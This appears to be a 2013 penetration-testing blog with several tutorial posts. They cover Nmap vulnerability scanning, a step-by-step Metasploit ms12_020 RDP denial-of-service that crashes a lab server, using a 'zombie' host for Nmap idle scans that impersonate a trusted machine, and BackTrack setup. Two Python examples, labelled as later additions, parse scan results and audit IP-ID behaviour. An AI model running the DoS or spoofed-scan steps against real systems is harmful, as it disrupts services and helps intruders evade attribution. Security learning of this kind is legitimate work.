Thursday 30 May 2013

NMAP & Metasploit - Scan and Exploit in 10mins

READY, SCAN, ATTACK!!!


First, we will find a target and ensure the host is up. We will do this by using Nmap:
#nmap -sn 192.168.71.156


Once we know the host is up and running, we will use Nmap to find any critical vulnerabilities. We invoke the command

#nmap --script vuln 192.168.71.156 --reason

With this command, Nmap will run the NSE scripts in the vuln category and check the host for vulnerabilities. Once the scan has completed, the result lists the vulnerabilities found on the host. The result even provides a link with more information about each vulnerability.
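To triage a larger scan rather than reading the screen, the same vuln results can be read from Nmap's XML output (-oX). The following is an added example, not part of the original post or of Nmap: it parses a constructed sample of that XML (host, port and reference URL are placeholders) and returns only the findings whose structured state is VULNERABLE, together with the port reason that --reason adds.

```python
import xml.etree.ElementTree as ET
# Constructed sample of `nmap -oX` output for one host, modelled on the
# structured layout that --script vuln scripts emit (vulns library tables).
# The host, port and reference URL are placeholders, not real scan data.
SAMPLE_XML = """<nmaprun>
  <host>
    <address addr="192.168.71.156" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="3389">
        <state state="open" reason="syn-ack"/>
        <script id="rdp-vuln-ms12-020" output="VULNERABLE">
          <table key="placeholder-vuln-id">
            <elem key="title">MS12-020 RDP denial of service (placeholder)</elem>
            <elem key="state">VULNERABLE</elem>
            <table key="refs">
              <elem>https://example.invalid/ms12-020-advisory</elem>
            </table>
          </table>
        </script>
        <script id="example-other-check" output="NOT VULNERABLE">
          <table key="placeholder-other">
            <elem key="state">NOT VULNERABLE</elem>
          </table>
        </script>
      </port>
    </ports>
  </host>
</nmaprun>"""

def vulnerable_findings(xml_text):
    """Return (host, port, state/reason, script id, title, refs) for each VULNERABLE finding."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            st = port.find("state")
            reason = f"{st.get('state')}/{st.get('reason')}"  # filled in by --reason
            for script in port.findall("script"):
                for table in script.findall("table"):
                    state = table.findtext("elem[@key='state']", default="")
                    if state.strip() != "VULNERABLE":
                        continue  # skip NOT VULNERABLE / LIKELY VULNERABLE tables
                    title = table.findtext("elem[@key='title']", default="")
                    refs = [e.text for e in table.findall("table[@key='refs']/elem")]
                    findings.append((addr, port.get("portid"), reason,
                                     script.get("id"), title, refs))
    return findings
```

Feed it the file written by `nmap -oX scan.xml --script vuln --reason <target>` to get a list of confirmed findings per host and port.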



Now let's exploit that vulnerability! First we need to check whether the exploit is in the Metasploit database. On your terminal, run

#locate ms12_020

The output shows that the exploit is available in metasploit.

Alternatively, you can also search for the exploit in msfconsole itself by firing up #msfconsole and then running
msf > search ms12_020


Now that we know the exploit is available, we will execute it.

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf  auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.71.156
msf  auxiliary(ms12_020_maxchannelids) > set RPORT 3389
msf  auxiliary(ms12_020_maxchannelids) > run


Once executed, the server will crash!!! Note that this is a Layer 7 DoS attack!




Wednesday 29 May 2013

Nmap & Metasploit - Finding a Zombie

Find a victim, make it a zombie and then use that zombie to bite it!


Many may not realize this, but Nmap has the ability to turn a machine into a zombie (well, not literally) and use it to scan other machines. This is another way to take advantage of the trust placed in another computer: 'take over' its identity and scan from it. Besides, this is far more challenging than using the -D (decoy) switch.

Well, first, it's not easy to find a potential zombie using Nmap (if anyone has an idea, do share), so we are going to use Metasploit to find potential zombie machines.

Open your terminal and type in
#msfconsole

Once loaded, type
msf > use auxiliary/scanner/ip/ipidseq 

If you want to see the available options, enter the following:
msf auxiliary(ipidseq) > show options

Then let's put in the IP range to scan for potential zombies
msf auxiliary(ipidseq) > set RHOSTS 192.168.71.150-192.168.71.153
msf auxiliary(ipidseq) > set THREADS 50
msf auxiliary(ipidseq) > run


Once run, the results will be shown, and if you see an IP with the remark 'Incremental!', it means you have a potential zombie!!!!!
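What the 'Incremental!' verdict actually means is that the host's IP ID field goes up by a small step with every packet it sends, so its traffic count is observable from outside; the same check lets you audit a host you administer. The following is an added example, not the ipidseq module's code: it classifies a sequence of IP ID values captured from one host (constructed samples below) using labels modelled on the ones ipidseq prints, with the step threshold being this example's own assumption.

```python
IPID_MOD = 65536  # the IP ID field is 16 bits wide

def _steps(ids):
    """Differences between consecutive IDs, modulo 2^16 so wraparound stays small."""
    return [(b - a) % IPID_MOD for a, b in zip(ids, ids[1:])]

def _byteswap(v):
    """Swap the two bytes of a 16-bit value (hosts that emit the ID little-endian)."""
    return ((v & 0xFF) << 8) | (v >> 8)

def classify_ipid(ids, max_step=10):
    """Classify IP IDs sampled from one host, in arrival order.
    max_step (assumed here, not the module's exact number) bounds an 'incremental' step."""
    if len(ids) < 3:
        return "Unknown (need more samples)"
    if all(i == 0 for i in ids):
        return "All zeros"            # host never sets the field: unusable as a zombie
    if len(set(ids)) == 1:
        return "Constant"             # same value every time: also unusable
    if all(1 <= s <= max_step for s in _steps(ids)):
        return "Incremental!"         # predictable counter: usable as a zombie
    if all(1 <= s <= max_step for s in _steps([_byteswap(i) for i in ids])):
        return "Broken little-endian incremental!"  # counter, but byte-swapped on the wire
    return "Randomized"               # no usable pattern

# Constructed sample captures (e.g. the id field read off a packet sniffer),
# not data from a real host.
SAMPLES = {
    "host-A": [31000, 31001, 31002, 31003, 31005],
    "host-B": [65534, 65535, 0, 1],       # increments across the 16-bit wraparound
    "host-C": [16, 272, 528],             # 0x1000, 0x1001, 0x1002 sent byte-swapped
    "host-D": [12345, 54321, 2222, 40000],
    "host-E": [0, 0, 0, 0],
}

def audit(samples):
    """Return {host: verdict} for every sampled host."""
    return {h: classify_ipid(ids) for h, ids in samples.items()}

if __name__ == "__main__":
    for host, verdict in audit(SAMPLES).items():
        print(f"{host}: {verdict}")
```

A host that lands in one of the two incremental classes is the kind ipidseq reports as a candidate zombie; on the defending side that is a hint to enable randomized IP IDs on it.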


So once a potential zombie is found, fire up Nmap and run the scan
#nmap -PN -sI <zombie IP> <victim IP>

Basically, what this scan does is scan another machine through the zombie machine, which acts somewhat like a proxy.

In what situation can we apply this?
Let's say you are on the same network and you cannot perform a scan against a server, but the person beside you can because he is 'trusted' or has been given special privileges. So the only way is to go through his machine and use it to scan the server instead. From the server network's side, the traffic looks valid and appears to come NOT from the 'attacker' but from the trusted zombie itself. :)

Tuesday 28 May 2013

Nmap - Finding Open Ports, Services and their Versions + more Juicy Info!!

If you are in a restaurant, chances are you are going to order something to eat.


Nmap does more than just scan for ports; it can also probe the versions of the services running on those ports. There are many scanners that do this, but I personally prefer Nmap because it is lightweight.

So a typical Nmap scan without any switches will find the open ports and the services running on them. Below is the standard output of a successfully completed Nmap scan.


If we want to see more juicy information in detail, including the versions of the services running on those ports, simply add the -A switch to the command. A single switch makes a huge difference.



Look at the details (in the yellow box) that Nmap -A can provide:


In time to come, I will show how Nmap -A in conjunction with other switches can display more details than I had imagined before.

Tuesday 21 May 2013

Physical Project - Making a Box to Safely Keep the Wires

All I need is a box, scissors, markers and a pencil.


The Problem:


The Tools:



The Work:


The Finish:



Nmap - Determining if the Host is Up

Hello! Are you there? I know your door is locked but i can tell if you are hiding. :)


Some websites disable ICMP, so that when people try to ping the website or its IP address, the ping reports 'Request Timed Out'.

Nmap has the capability to find out whether the host is up despite it not being pingable.

Open a terminal and type #nmap -sn <IP>


As you can see, Nmap reports '1 host up'. :)

Fun with Command on Linux - Changing Resolution

I'm a RESOLUTIONIST! :P


Though you can change the resolution through the GUI in either KDE or GNOME, nothing is sexier than doing it from the command line. So here we go:

Open the terminal, type in #xrandr and press Enter



It will list all the resolutions you can play around with.


Type #xrandr -s 1280x720 and press Enter


Monday 20 May 2013

BackTrack 5 - Removing and Installing Metasploit Framework

Remove and Reinstall!!!


The reason I remove Metasploit is that, based on experience, Metasploit has issues running certain things properly when it is first installed. Hence it's best to remove it and then reinstall it.

Open the terminal and type #apt-get remove metasploit


Reinstall it by running #apt-get install metasploit


Once installed type in #msfconsole


Backtrack 5 - Upgrade Firefox to the latest version

Oh Firefox! Time for an Upgrade!


Upgrading Firefox to the latest version. Click Applications > Internet > Firefox Web Browser


Click on Help > About Firefox


Click on Apply Update


There you go... Firefox upgraded to v21.0 from 14.0.1


Getting started - Installing BackTrack5r3 on VMware Workstation 8.

In the previous tutorial, we ran BackTrack on VMware from the .iso file. Now we want to install it on VMware so that we don't have to run it from the .iso and are able to create files and folders on it.

Run your BackTrack VM and log in to the account. On the desktop, click on 'Install BackTrack'


Choose your preferred language and click Forward


Choose your region and click Forward


Choose your Keyboard layout and click Forward


By default, BackTrack will use all available disk allocated during the setup. Click Forward


Click Install


Installation will take between 20 and 40 minutes.


Once completed, click Restart Now


Press Enter


The VM will reboot, and once you log in to your account and run #startx, you will get your GUI. You can further test your installation by removing the .iso from the VM settings and starting it to see if BackTrack runs without the .iso file.


Cheers. :)

Getting started - Running BackTrack5r3 on VMware Workstation 8.

First and foremost, let's download the .iso file from the main website to our host machine.

http://www.backtrack-linux.org/backtrack/backtrack-5-r3-released/

Once downloaded, start up VMware Workstation and click File > New Virtual Machine


Click Next for the Typical setup


Browse to the .iso file that we downloaded just now and click Next


Choose Linux, and since BackTrack 5 is based on Ubuntu, we shall choose Ubuntu as the version.


Give a name to our virtual machine and choose the location where its files should reside, then click Next


Choose the disk size we want to allocate to our virtual machine. *It's better to allocate more space, as later we are going to install it so that it no longer runs from the .iso file.


Check the settings and click Finish


Press Enter


Choose the first option


The default login is 'root' and the default password is 'toor'


Once the username and password are entered, type #startx


BackTrack will now load into its GUI


There.... you have now successfully launched BackTrack5r3 on your virtual machine. The next tutorial will be on how to install BackTrack into the VM so that we do not have to run it from the .iso file.